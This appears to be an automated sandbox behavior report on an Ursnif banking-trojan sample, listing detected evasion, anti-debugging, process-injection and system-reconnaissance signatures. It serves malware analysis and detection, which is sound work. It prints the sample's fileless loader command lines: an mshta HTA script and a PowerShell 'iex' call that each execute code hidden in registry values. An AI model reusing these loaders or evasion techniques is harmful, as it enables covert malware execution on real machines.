Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\mshta.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2591 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6077 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2336 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\control.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_032E3512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06004CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_06004CF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06015518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_06015518
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_0600834C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_0600B88D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_060016E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_060016E1
Source: explorer.exe, 00000024.00000000.485204567.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000024.00000000.485204567.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000024.00000000.484371056.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000024.00000000.484653119.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000002.504744729.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000024.00000002.504777682.0000000005603000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: mshta.exe, 0000001B.00000003.420802622.0000017D2F3E6000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
Source: explorer.exe, 00000024.00000000.485204567.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000024.00000000.485204567.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000024.00000002.504777682.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000024.00000000.484371056.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000024.00000000.484371056.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000024.00000000.486779764.0000000008907000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW:\x1
Source: explorer.exe, 00000024.00000000.484371056.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E1CF6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6E4E1CF6
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0602556E
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E510D40 mov eax, dword ptr fs:[00000030h] 0_2_6E510D40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E510C76 mov eax, dword ptr fs:[00000030h] 0_2_6E510C76
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E51087D push dword ptr fs:[00000030h] 0_2_6E51087D
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4F0C05 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_6E4F0C05
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E3838 __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6E4E3838
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E1CF6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6E4E1CF6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E797C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6E4E797C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06001F12 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 1_2_06001F12

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: 5A0000 protect: page execute and read and write Jump to behavior
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 736E1580 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3412 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7FA6A12E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 5A0000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7FA6A12E0 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1E30.tmp' 'c:\Users\user\AppData\Local\Temp\vy454zdn\CSCE57ED4738764ED181FB6CF8C395867D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES310C.tmp' 'c:\Users\user\AppData\Local\Temp\vkjmiujf\CSC5E84712ED974B8AAC9F3D817F74BE40.TMP'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000024.00000002.494191658.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: loaddll32.exe, 00000000.00000002.473604486.0000000001600000.00000002.00000001.sdmp, rundll32.exe, 00000001.00000002.474194963.0000000003840000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.458041713.0000000001980000.00000002.00000001.sdmp, control.exe, 00000025.00000002.473939310.00000234DCB90000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.473604486.0000000001600000.00000002.00000001.sdmp, rundll32.exe, 00000001.00000002.474194963.0000000003840000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.458041713.0000000001980000.00000002.00000001.sdmp, control.exe, 00000025.00000002.473939310.00000234DCB90000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.473604486.0000000001600000.00000002.00000001.sdmp, rundll32.exe, 00000001.00000002.474194963.0000000003840000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.458041713.0000000001980000.00000002.00000001.sdmp, control.exe, 00000025.00000002.473939310.00000234DCB90000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.473604486.0000000001600000.00000002.00000001.sdmp, rundll32.exe, 00000001.00000002.474194963.0000000003840000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.458041713.0000000001980000.00000002.00000001.sdmp, control.exe, 00000025.00000002.473939310.00000234DCB90000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032EA12A cpuid 1_2_032EA12A
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_6E4D111B
Source: C:\Windows\System32\loaddll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesA, 0_2_6E4E98AA
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 0_2_6E4E938D
Source: C:\Windows\System32\loaddll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 0_2_6E4E9782
Source: C:\Windows\System32\loaddll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesA, 0_2_6E4E9843
Source: C:\Windows\System32\loaddll32.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW, 0_2_6E4F080B
Source: C:\Windows\System32\loaddll32.exe Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA, 0_2_6E4F083F
Source: C:\Windows\System32\loaddll32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,__invoke_watson,__itoa_s, 0_2_6E4E98E6
Source: C:\Windows\System32\loaddll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 0_2_6E4E94A4
Source: C:\Windows\System32\loaddll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_6E4F097E
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen, 0_2_6E4E953C
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA, 0_2_6E4ED9FC
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06005F90 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 1_2_06005F90
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D116D GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_6E4D116D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032EA12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 1_2_032EA12A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D1756 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6E4D1756
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387825227.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.394470622.0000000005C1B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387917414.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387785430.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387944110.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.457563065.0000000003350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387897096.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387985412.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387963889.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4880, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3412, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3888, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387825227.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.394470622.0000000005C1B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387917414.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387785430.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387944110.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.457563065.0000000003350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387897096.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387985412.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387963889.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4880, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3412, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3888, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
